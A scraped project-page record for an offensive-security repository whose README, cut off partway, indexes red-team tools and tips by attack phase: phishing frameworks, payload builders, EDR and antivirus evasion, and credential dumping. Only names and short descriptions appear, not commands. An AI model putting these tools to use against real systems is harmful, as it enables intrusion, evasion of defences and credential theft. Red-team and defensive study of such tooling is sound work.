[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-72965":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":10,"languages":10,"totalLinesOfCode":10,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":16,"stars7d":17,"stars30d":18,"stars90d":15,"forks30d":15,"starsTrendScore":19,"compositeScore":20,"rankGlobal":10,"rankLanguage":10,"license":10,"archived":21,"fork":21,"defaultBranch":22,"hasWiki":23,"hasPages":21,"topics":24,"createdAt":10,"pushedAt":10,"updatedAt":42,"readmeContent":43,"aiSummary":44,"trendingCount":15,"starSnapshotCount":15,"syncStatus":45,"lastSyncTime":46,"discoverSource":47},72965,"RedTeam-Tools","A-poc\u002FRedTeam-Tools","A-poc","Tools and Techniques for Red Team \u002F Penetration Testing","",null,8825,1184,138,1,0,20,44,93,60,111.52,false,"main",true,[25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41],"cheatsheet","cybersecurity","enumeration","hacking","linux","mitre-attack","payload","penetration-testing","pentest","pentest-tools","red-team","red-team-tools","redteam","resources","security-tools","tools","windows","2026-06-12 04:01:07","# RedTeam-Tools\n\n\u003Cp align=\"center\">\n\u003Cimg src=\"https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210680426-20a92131-56f9-43ad-be82-f449e3215dda.png\" height=\"300\">\n\u003C\u002Fp>\n\nThis github repository contains a collection of **150+** **tools** and **resources** that can be useful for **red teaming activities**. \n\nSome of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.\n\n> ๐Ÿ”— If you are a Blue Teamer, check out [BlueTeam-Tools](https:\u002F\u002Fgithub.com\u002FA-poc\u002FBlueTeam-Tools)\n\n> **Warning** \n> \n> *The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.*\n\n> **Note** \n> \n> *Hide Tool List headings with the arrow.*\n> \n> *Click ๐Ÿ”™ to get back to the list.*\n\n# Tool List\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Red Team Tips\u003C\u002Fb> 19 tips\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \t\u003Cli>\u003Cb>\u003Ca href=\"#improved-html-smuggling-with-mouse-move-eventlistener\">Improved HTML smuggling with mouse move eventlistener\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @pr0xylife\u003C\u002Fi>\u003C\u002Fli>\n \t\u003Cli>\u003Cb>\u003Ca href=\"#google-translate-for-phishing\">Google translate for phishing\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @malmoeb\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#hiding-the-local-admin-account\">Hiding the local admin account\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#cripple-windows-defender-by-deleting-signatures\">Cripple windows defender by deleting signatures\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#enable-multiple-rdp-sessions-per-user\">Enable multiple RDP sessions per user\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#sysinternals-psexecexe-local-alternative\">Sysinternals PsExec.exe local alternative\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @GuhnooPlusLinux\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#live-off-the-land-port-scanner\">Live off the land port scanner\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#proxy-aware-powershell-downloadstring\">Proxy aware PowerShell DownloadString\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#looking-for-internal-endpoints-in-browser-bookmarks\">Looking for internal endpoints in browser bookmarks\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#query-dns-records-for-enumeration\">Query DNS records for enumeration\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#unquoted-service-paths-without-powerup\">Unquoted service paths without PowerUp\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#bypass-a-disabled-command-prompt-with-k\">Bypass a disabled command prompt with \u002Fk\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Martin Sohn Christensen\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#stop-windows-defender-deleting-mimikatzexe\">Stop windows defender deleting mimikatz.exe\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @GuhnooPlusLinux\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#check-if-you-are-in-a-virtual-machine\">Check if you are in a virtual machine\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @dmcxblue\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#enumerate-applocker-rules\">Enumerate AppLocker rules\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @Alh4zr3d\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#cmd-shortcut-with-6-pixels-via-mspaint\">CMD shortcut with 6 pixels via mspaint\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PenTestPartners\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#link-spoofing-with-preventdefault-javascript-method\">Link spoofing with PreventDefault JavaScript method\u003C\u002Fa>\u003C\u002Fb>\u003Ci> \u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#check-smb-firewall-rules-with-responder\">Check SMB firewall rules with Responder\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @malmoeb\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#disable-av-with-sysinternals-pssuspend\">Disable AV with SysInternals PsSuspend\u003C\u002Fa>\u003C\u002Fb>\u003Ci> @0gtweet\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful> \n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Reconnaissance\u003C\u002Fb> 24 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#spiderfoot\">spiderfoot\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Automated OSINT and attack surface mapping\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#reconftw\">reconftw\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Automated subdomain and vulnerability recon tool\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#subzy\">subzy\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Subdomain takeover vulnerability checker\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#smtp-user-enum\">smtp-user-enum\u003C\u002Fa>\u003C\u002Fb>\u003Ci> SMTP user enumeration\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#crtsh---httprobe---eyewitness\">crt.sh -> httprobe -> EyeWitness\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Automated domain screenshotting\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#jsendpoints\">jsendpoints\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Extract page DOM links\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#nuclei\">nuclei\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Vulnerability scanner\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#certsniff\">certSniff\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Certificate transparency log keyword sniffer\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#gobuster\">gobuster\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Website path brute force\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#feroxbuster\">feroxbuster\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Fast content discovery tool written in Rust\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#cloudbrute\">CloudBrute\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Cloud infrastructure brute force\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#dnsrecon\">dnsrecon\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Enumerate DNS records\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#shodanio\">Shodan.io\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Public facing system knowledge base\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#aort\">AORT (All in One Recon Tool)\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Subdomain enumeration\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#spoofcheck\">spoofcheck\u003C\u002Fa>\u003C\u002Fb>\u003Ci> SPF\u002FDMARC record checker\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#awsbucketdump\">AWSBucketDump\u003C\u002Fa>\u003C\u002Fb>\u003Ci> S3 bucket enumeration\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#githarvester\">GitHarvester\u003C\u002Fa>\u003C\u002Fb>\u003Ci> GitHub credential searcher\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#trufflehog\">truffleHog\u003C\u002Fa>\u003C\u002Fb>\u003Ci> GitHub credential scanner\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#dismap\">Dismap\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Asset discovery\u002Fidentification\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#enum4linux\">enum4linux\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows\u002Fsamba enumeration\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#skanuvaty\">skanuvaty\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Dangerously fast dns\u002Fnetwork\u002Fport scanner\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#metabigor\">Metabigor\u003C\u002Fa>\u003C\u002Fb>\u003Ci> OSINT tool without API\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#gitrob\">Gitrob\u003C\u002Fa>\u003C\u002Fb>\u003Ci> GitHub sensitive information scanner\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#gowitness\">gowitness\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Web screenshot utility using Chrome Headless\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Resource Development\u003C\u002Fb> 12 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#remoteinjector\">remoteinjector\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Inject remote template link into word document\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#chimera\">Chimera\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell obfuscation\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#msfvenom\">msfvenom\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Payload creation\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#shellter\">Shellter\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Dynamic shellcode injection tool\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#freeze\">Freeze\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Payload creation (circumventing EDR)\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#wordsteal\">WordSteal\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Steal NTML hashes with Microsoft Word\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#ntapi-undocumented-functions\">NTAPI Undocumented Functions\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows NT Kernel, Native API and drivers\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#kernel-callback-functions\">Kernel Callback Functions\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Undocumented Windows APIs\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#offensivevba\">OffensiveVBA\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Office macro code execution and evasion techniques\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#wsh\">WSH\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Wsh payload\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#hta\">HTA\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Hta payload\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#vba\">VBA\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Vba payload\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Initial Access\u003C\u002Fb> 10 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#credmaster\">CredMaster\u003C\u002Fa>\u003C\u002Fb>\u003Ci> CredKing password spraying tool\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#trevorspray\">TREVORspray\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Password sprayer with threading\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#evilqr\">evilqr\u003C\u002Fa>\u003C\u002Fb>\u003Ci> QRLJacking phishing PoC\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#cupp\">CUPP\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Common User Passwords Profiler (CUPP)\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#bash-bunny\">Bash Bunny\u003C\u002Fa>\u003C\u002Fb>\u003Ci> USB attack tool\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#evilgophish\">EvilGoPhish\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Phishing campaign framework\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#social-engineer-toolkit-set\">The Social-Engineer Toolkit\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Phishing campaign framework\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#hydra\">Hydra\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Brute force tool\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#squarephish\">SquarePhish\u003C\u002Fa>\u003C\u002Fb>\u003Ci> OAuth\u002FQR code phishing framework\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#king-phisher\">King Phisher\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Phishing campaign framework\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Execution\u003C\u002Fb> 13 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#responder\">Responder\u003C\u002Fa>\u003C\u002Fb>\u003Ci> LLMNR, NBT-NS and MDNS poisoner\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#secretsdump\">secretsdump\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Remote hash dumper\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#evil-winrm\">evil-winrm\u003C\u002Fa>\u003C\u002Fb>\u003Ci> WinRM shell\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#donut\">Donut\u003C\u002Fa>\u003C\u002Fb>\u003Ci> In-memory .NET execution\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#macro_pack\">Macro_pack\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Macro obfuscation\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#powersploit\">PowerSploit\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell script suite\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#rubeus\">Rubeus\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active directory hack tool\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#sharpup\">SharpUp\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows vulnerability identifier\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#sqlrecon\">SQLRecon\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Offensive MS-SQL toolkit\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#ultimateapplockerbypasslist\">UltimateAppLockerByPassList\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Common AppLocker Bypass Techniques\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#starfighters\">StarFighters\u003C\u002Fa>\u003C\u002Fb>\u003Ci> JavaScript and VBScript Based Empire Launcher\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#demiguise\">demiguise\u003C\u002Fa>\u003C\u002Fb>\u003Ci> HTA encryption tool\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#powerzure\">PowerZure\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell framework to assess Azure security\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Persistence\u003C\u002Fb> 4 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#impacket\">Impacket\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Python script suite\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#empire\">Empire\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Post-exploitation framework\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#sharpersist\">SharPersist\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows persistence toolkit\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#ligolo-ng\">ligolo-ng\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Tunneling tool that uses a TUN interface\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Privilege Escalation\u003C\u002Fb> 11 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#crassus\">Crassus\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows privilege escalation discovery tool\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#linpeas\">LinPEAS\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Linux privilege escalation\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#winpeas\">WinPEAS\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows privilege escalation\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#linux-smart-enumeration\">linux-smart-enumeration\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Linux privilege escalation\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#certify\">Certify\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active directory privilege escalation\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#get-gpppassword\">Get-GPPPassword\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows password extraction\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#sherlock\">Sherlock\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell privilege escalation tool\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#watson\">Watson\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows privilege escalation tool\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#impulsivedllhijack\">ImpulsiveDLLHijack\u003C\u002Fa>\u003C\u002Fb>\u003Ci> DLL Hijack tool\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#adfsdump\">ADFSDump\u003C\u002Fa>\u003C\u002Fb>\u003Ci> AD FS dump tool\u003C\u002Fi>\u003C\u002Fli> \n \u003Cli>\u003Cb>\u003Ca href=\"#beroot\">BeRoot\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Multi OS Privilege Escalation Project\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Defense Evasion\u003C\u002Fb> 8 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#invoke-obfuscation\">Invoke-Obfuscation\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Script obfuscator\u003C\u002Fi>\u003C\u002Fli>\n\t \u003Cli>\u003Cb>\u003Ca href=\"#veil\">Veil\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Metasploit payload obfuscator\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#sharpblock\">SharpBlock\u003C\u002Fa>\u003C\u002Fb>\u003Ci> EDR bypass via entry point execution prevention\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#alcatraz\">Alcatraz\u003C\u002Fa>\u003C\u002Fb>\u003Ci> GUI x64 binary obfuscator\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#mangle\">Mangle\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Compiled executable manipulation\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#amsi-fail\">AMSI Fail\u003C\u002Fa>\u003C\u002Fb>\u003Ci> PowerShell snippets that break or disable AMSI\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#scarecrow\">ScareCrow\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Payload creation framework designed around EDR bypass\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#moonwalk\">moonwalk\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Linux system log and filesystem timestamp remover\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Credential Access\u003C\u002Fb> 11 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#mimikatz\">Mimikatz\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows credential extractor\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#lazagne\">LaZagne\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Local password extractor\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#hashcat\">hashcat\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Password hash cracking\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#john-the-ripper\">John the Ripper\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Password hash cracking\u003C\u002Fi>\u003C\u002Fli>\n\t \u003Cli>\u003Cb>\u003Ca href=\"#scomdecrypt\">SCOMDecrypt\u003C\u002Fa>\u003C\u002Fb>\u003Ci> SCOM Credential Decryption Tool\u003C\u002Fi>\u003C\u002Fli>\n\t \u003Cli>\u003Cb>\u003Ca href=\"#nanodump\">nanodump\u003C\u002Fa>\u003C\u002Fb>\u003Ci> LSASS process minidump creation\u003C\u002Fi>\u003C\u002Fli>\n\t \u003Cli>\u003Cb>\u003Ca href=\"#eviltree\">eviltree\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Tree remake for credential discovery\u003C\u002Fi>\u003C\u002Fli>\n\t \u003Cli>\u003Cb>\u003Ca href=\"#seeyoucm-thief\">SeeYouCM-Thief\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Cisco phone systems configuration file parsing\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#mailsniper\">MailSniper\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Microsoft Exchange Mail Searcher\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#sharpchromium\">SharpChromium\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Cookie, history and saved login chromium extractor\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#dploot\">dploot\u003C\u002Fa>\u003C\u002Fb>\u003Ci> DPAPI looting remotely in Python\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Discovery\u003C\u002Fb> 6 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#pcredz\">PCredz\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Credential discovery PCAP\u002Flive interface\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#pingcastle\">PingCastle\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active directory assessor\u003C\u002Fi>\u003C\u002Fli>\n \t \u003Cli>\u003Cb>\u003Ca href=\"#seatbelt\">Seatbelt\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Local vulnerability scanner\u003C\u002Fi>\u003C\u002Fli>\n \t \u003Cli>\u003Cb>\u003Ca href=\"#adrecon\">ADRecon\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active directory recon\u003C\u002Fi>\u003C\u002Fli>\n \t \u003Cli>\u003Cb>\u003Ca href=\"#adidnsdump\">adidnsdump\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Active Directory Integrated DNS dumping\u003C\u002Fi>\u003C\u002Fli>\n \t \u003Cli>\u003Cb>\u003Ca href=\"#scavenger\">scavenger\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Scanning tool for scavenging systems\u003C\u002Fi>\u003C\u002Fli>\n \u003C\u002Ful>\n \u003C\u002Ful>\n\u003C\u002Fdetails>\n\n\u003Cdetails open>\n \u003Csummary>\u003Cb>Lateral Movement\u003C\u002Fb> 12 tools\u003C\u002Fsummary>\n \u003Cul>\n \u003Cul>\n \u003Cli>\u003Cb>\u003Ca href=\"#crackmapexec\">crackmapexec\u003C\u002Fa>\u003C\u002Fb>\u003Ci> Windows\u002FActive directory lateral movement toolkit\u003C\u002Fi>\u003C\u002Fli>\n \u003Cli>\u003Cb>\u003Ca href=\"#wmiops\">WMIOps\u003C\u002Fa>\u003C\u002Fb>\u003Ci> WMI remote commands\u003C\u002Fi>\u003C\u002Fli>\n 